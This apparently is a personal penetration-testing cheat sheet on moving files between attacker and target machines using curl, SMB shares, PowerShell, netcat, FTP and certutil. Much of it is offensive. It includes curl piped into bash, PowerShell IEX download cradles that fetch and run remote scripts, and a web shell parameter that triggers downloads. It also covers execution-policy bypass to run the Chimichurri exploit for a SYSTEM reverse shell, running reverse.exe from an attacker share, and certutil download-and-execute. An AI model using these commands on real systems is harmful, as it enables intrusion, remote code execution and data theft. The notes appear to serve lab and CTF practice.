More
Curl
vim script.py
python -m SimpleHTTPServer 80 ..share
curl http://10.x.x.x:80/script.py -o /opt/tmp.py ..d/l overwrite
curl $MyIP:80/LinEnum.sh | bash ..d/l execute (linux)
curl --user david:Nowonly4me http://10.x.x.x/~david/
curl --user david:Nowonly4me --negotiate http://10.x.x.x/~david/
smbserver
Share from Linux SMB to Windows
locate smbserver.py ..find
cd /usr/share/doc/python3-impacket/examples ..prep
sudo python3 ./smbserver.py share /tmp ..share
impacket-smbserver share `pwd` ..another method
smbclient -L 10.x.x.x --no-pass ..test
net view \\10.x.x.x ..windows command
net use z: \\10.x.x.x\pub ..map a drive
copy "Oracle Issue.txt" z: ..copy file
dir \\10.x.x.x\share ..windows list directory
copy \\10.x.x.x\share\app C:\Windows\Temp\ ..windows copy
\\10.x.x.x\share\reverse.exe ..run
Windows Share
Linux: Copy to Windows Share
smbclient //10.x.x.x/sharename -U domain/username
Linux: Mount Windows Share
mkdir /mnt/smbshare
sudo mount -t cifs //serverfs/c$ -o username=bob,password=xyz /mnt/smbshare
cd /mnt/smbshare
Windows: Copy to Windows Share
copy exploit.exe \\10.x.x.x\users\bob
HTTP Server One Liners
> python2 -m SimpleHTTPServer 80
> python3 -m http.server 80
> php -S localhost:80 -t evil/
> while true; do nc -l 80 < test.html; done
> ncat -k -l -p 80 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/evil.html"
> perl -MIO::All -e 'io(":80")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'
> ruby -run -e httpd . -p 80
From inetd.conf:
> 80 stream tcp nowait nobody cat cat /somefile
... where /somefile has the HTTP response line, headers and body
Powershell
Share with Linux: python3 - m http.server
Download with Window Powershell
----------------------
powershell.exe "(New-Object System.Net.WebClient).Downloadfile('http://$MyIP:8000/myfile','myfile')"
----------------------
echo IEX(New-Object Net.WebClient).DownloadString('http://<ip>:<port>/Sherlock.ps1') | powershell -noprofile
----------------------
echo $WebClient = New-Object System.Net.WebClient > wget.ps1
echo $WebClient.DownloadFile($Args[0],$Args[1]) >> wget.ps1
powershell -ExecutionPolicy Bypass -File wget.ps1 http://$MyIP:8000/file.exe file.exe
----------------------
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=echo IES(New-Object Net.WebClient).DownloadString('http://10.x.x.x:8000/PowerUp.ps1')|powershell -noprofile
Powershell Advanced
Can't execute the payload?
Powershell ByPass Execution Policy
cd C:\ColdFusion8\ or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1
Chimichurri.exe 10.10.14.x 5555
nc -nvlp 5555
connected ..system!!
smb setup issues
Run smbserver.py from Linux
Now Windows can share back to Linux
------------------------
Install Attempts:
python --version
python3 --version
apt-get install python3.6-dev libmysqlclient-dev
pip install --upgrade setuptools --user python
sudo apt-get install libpcap-dev libpq-dev
pip3 install --upgrade setuptools --user python
cd /opt/impacket
sudo -i
git clone https://github.com/SecureAuthCorp/impacket.git
pip install .
pip3 install .
python3 -m pip install -U pip
python3 -m pip install -U setuptools
pip install impacket
pip3 install impacket
smb setup impacket python2
Install the old pip (unofficial way)
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py
PATH=/home/kali/.local/bin:$PATH ..update PATH manually
pip --version ..confirm v2 not v3
pip 20.3.4 from /home/kali/.local/lib/python2.7/site-packages/pip (python 2.7)
pip install --upgrade setuptools
pip install impacket
smb optional
> impacket-smbserver share `myfolder`
http://10.x.x.x/ippsec.php?fexe=\\10.x.x.x\share\privesc.exe whoami
nc
Easy:
nc -lp 4444 > out.file
nc -w 3 DestIP 4444 < out.file
Faster:
nc -lp 4444 | uncompress -c | tar xvfp -
tar cfp - /some/dir | compress -c | nc -w 3 DestIP 4444
Whole Hard Drive:
dd if=/dev/hda3 | gzip -9 | nc -l 3333
nc DestIP 3333 | pv -b > hdImage.img.gz
updog
Looks like an interesting option if you need SSL
updog
updog -p 4444 --ssl
updog -d /tmp --password mypax
ftp
anonymous, writable, port 2121
linux:
pip install pyftpdlib
python -m pyftpdlib -w
python3 -m pyftpdlib -p 21 -u mike -P paxx
windows:
ftp
open $MyIP
user mike passwurd
passive
put localfilename remotefilename
bye
ftp -n < ftpcommands.txt ..optional
Permission Trouble
You may have a permissions problem
Save and execute from the Temp folder!
cd C:\Windows\Temp\
copy \\10.x.x.x\share\myapp.exe .
myapp.exe
certutil
You can download files on Windows with this tool
rs.Exec("certutil -urlcache -split -f http://10.x.x.x/agent.exe C:\\users\\public\\agent.exe")
rs.Exec("cmd /c C:\users\public\agent.exe") ..execute
http://10.x.x.x/UploadedFiles/web.config ..execute
